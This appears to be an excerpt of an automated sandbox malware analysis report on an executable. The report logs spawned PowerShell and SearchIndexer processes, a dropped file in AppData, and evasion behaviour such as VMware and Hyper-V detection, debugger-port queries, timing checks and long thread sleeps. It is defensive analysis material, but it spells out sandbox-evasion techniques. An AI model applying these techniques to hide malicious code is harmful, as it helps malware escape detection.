            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: JeouiaPf03mHSBH.exe PID: 7080, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: snTlRrBza.exe PID: 7260, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\SearchIndexer.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\SearchIndexer.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\SearchIndexer.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\SearchIndexer.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\SearchIndexer.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\SearchIndexer.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\SearchIndexer.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\SearchIndexer.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeMemory allocated: 3210000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeMemory allocated: 3420000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeMemory allocated: 3260000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeMemory allocated: 99F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeMemory allocated: A9F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeMemory allocated: AC10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeMemory allocated: BC10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMemory allocated: 3210000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMemory allocated: 5210000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMemory allocated: 9420000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMemory allocated: A420000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMemory allocated: A630000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMemory allocated: B630000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0152096E rdtsc 6_2_0152096E
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6622Jump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeWindow / User API: threadDelayed 9751Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.7 %
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.4 %
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe TID: 7156Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe TID: 7288Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exe TID: 7904Thread sleep count: 220 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exe TID: 7904Thread sleep time: -440000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exe TID: 7904Thread sleep count: 9751 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exe TID: 7904Thread sleep time: -19502000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe TID: 7944Thread sleep time: -40000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\SearchIndexer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\SearchIndexer.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: snTlRrBza.exe, 00000007.00000002.2036842591.0000000005C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: JeouiaPf03mHSBH.exe, 00000000.00000002.1775941369.0000000005B83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: SearchIndexer.exe, 00000011.00000002.2924136902.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
            Source: snTlRrBza.exe, 00000007.00000002.2036842591.0000000005C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\g
            Source: qRurKwDVhn.exe, 00000014.00000002.2924838468.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.2624739191.000001F56E7DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0152096E rdtsc 6_2_0152096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004179B3 LdrLoadDll,6_2_004179B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01578158 mov eax, dword ptr fs:[00000030h]6_2_01578158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01574144 mov eax, dword ptr fs:[00000030h]6_2_01574144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01574144 mov eax, dword ptr fs:[00000030h]6_2_01574144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01574144 mov ecx, dword ptr fs:[00000030h]6_2_01574144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01574144 mov eax, dword ptr fs:[00000030h]6_2_01574144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01574144 mov eax, dword ptr fs:[00000030h]6_2_01574144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E6154 mov eax, dword ptr fs:[00000030h]6_2_014E6154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E6154 mov eax, dword ptr fs:[00000030h]6_2_014E6154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DC156 mov eax, dword ptr fs:[00000030h]6_2_014DC156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158A118 mov ecx, dword ptr fs:[00000030h]6_2_0158A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158A118 mov eax, dword ptr fs:[00000030h]6_2_0158A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158A118 mov eax, dword ptr fs:[00000030h]6_2_0158A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158A118 mov eax, dword ptr fs:[00000030h]6_2_0158A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A0115 mov eax, dword ptr fs:[00000030h]6_2_015A0115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E10E mov eax, dword ptr fs:[00000030h]6_2_0158E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E10E mov ecx, dword ptr fs:[00000030h]6_2_0158E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E10E mov eax, dword ptr fs:[00000030h]6_2_0158E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E10E mov eax, dword ptr fs:[00000030h]6_2_0158E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E10E mov ecx, dword ptr fs:[00000030h]6_2_0158E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E10E mov eax, dword ptr fs:[00000030h]6_2_0158E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E10E mov eax, dword ptr fs:[00000030h]6_2_0158E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E10E mov ecx, dword ptr fs:[00000030h]6_2_0158E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E10E mov eax, dword ptr fs:[00000030h]6_2_0158E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158E10E mov ecx, dword ptr fs:[00000030h]6_2_0158E10E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01510124 mov eax, dword ptr fs:[00000030h]6_2_01510124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155E1D0 mov eax, dword ptr fs:[00000030h]6_2_0155E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155E1D0 mov eax, dword ptr fs:[00000030h]6_2_0155E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155E1D0 mov ecx, dword ptr fs:[00000030h]6_2_0155E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155E1D0 mov eax, dword ptr fs:[00000030h]6_2_0155E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155E1D0 mov eax, dword ptr fs:[00000030h]6_2_0155E1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A61C3 mov eax, dword ptr fs:[00000030h]6_2_015A61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A61C3 mov eax, dword ptr fs:[00000030h]6_2_015A61C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015101F8 mov eax, dword ptr fs:[00000030h]6_2_015101F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B61E5 mov eax, dword ptr fs:[00000030h]6_2_015B61E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156019F mov eax, dword ptr fs:[00000030h]6_2_0156019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156019F mov eax, dword ptr fs:[00000030h]6_2_0156019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156019F mov eax, dword ptr fs:[00000030h]6_2_0156019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156019F mov eax, dword ptr fs:[00000030h]6_2_0156019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0159C188 mov eax, dword ptr fs:[00000030h]6_2_0159C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0159C188 mov eax, dword ptr fs:[00000030h]6_2_0159C188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01520185 mov eax, dword ptr fs:[00000030h]6_2_01520185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01584180 mov eax, dword ptr fs:[00000030h]6_2_01584180
